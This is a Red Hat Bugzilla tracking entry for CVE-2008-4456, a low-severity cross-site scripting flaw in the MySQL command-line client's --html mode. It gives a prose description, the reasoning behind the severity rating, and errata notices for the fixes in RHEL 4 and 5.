Bug 466518 (CVE-2008-4456)

Summary: CVE-2008-4456 mysql: mysql command line client XSS flaw
Product: [Other] Security Response Reporter: Josh Bressers <bressers>
Component: vulnerabilityAssignee: Red Hat Product Security <security-response-team>
Status: CLOSED ERRATA QA Contact:
Severity: low Docs Contact:
Priority: low    
Version: unspecifiedCC: jlieskov, kreilly, kvolny, ldimaggi, patrickm, support, tgl, vdanen
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: All   
OS: Linux   
URL: http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4456
Whiteboard:
Fixed In Version: Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of: Environment:
Last Closed: 2013-04-24 04:20:50 UTC Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:
Bug Depends On: 502169, 512255, 512257, 516803    
Bug Blocks:    

Description Josh Bressers 2008-10-10 17:50:39 UTC 
Cross-site scripting (XSS) vulnerability in the command-line client in MySQL 5.0.26 through 5.0.45, when the --html option is enabled, allows attackers to inject arbitrary web script or HTML by placing it in a database cell, which might be accessed by this client when composing an HTML document.

http://www.securityfocus.com/archive/1/archive/1/496842/100/0/threaded
http://www.securityfocus.com/archive/1/archive/1/496877/100/0/threaded
http://www.henlich.de/it-security/mysql-command-line-client-html-injection-vulnerability
http://bugs.mysql.com/bug.php?id=27884
http://secunia.com/advisories/32072
Comment 2 Jan Lieskovsky 2009-05-14 17:21:32 UTC 
The issue has been rated as having low security impact, as this can only be a security flaw when all following conditions are met:

1) A database contains untrusted third party data.
2) A site uses the mysql command line tool with the --html option.
3) The resulting HTML output is placed and viewed on a web site the attacker    
   could use to launch a cross-site-scripting attack.
Comment 5 errata-xmlrpc 2009-09-02 09:45:30 UTC 
This issue has been addressed in following products:

  Red Hat Enterprise Linux 5

Via RHSA-2009:1289 https://rhn.redhat.com/errata/RHSA-2009-1289.html
Comment 6 errata-xmlrpc 2009-09-02 12:10:03 UTC 
This issue has been addressed in following products:

  Red Hat Enterprise Linux 5

Via RHSA-2009:1289 https://rhn.redhat.com/errata/RHSA-2009-1289.html
Comment 8 Vincent Danen 2009-09-04 21:18:37 UTC 
This issue does affect Red Hat Enterprise Linux 3 and 4, however the Security Response Team has rated it has having low impact and may be addressed in a future update.
Comment 9 errata-xmlrpc 2009-09-23 21:39:01 UTC 
This issue has been addressed in following products:

  Red Hat Web Application Stack for RHEL 5

Via RHSA-2009:1461 https://rhn.redhat.com/errata/RHSA-2009-1461.html
Comment 10 errata-xmlrpc 2010-02-16 16:27:44 UTC 
This issue has been addressed in following products:

  Red Hat Enterprise Linux 4

Via RHSA-2010:0110 https://rhn.redhat.com/errata/RHSA-2010-0110.html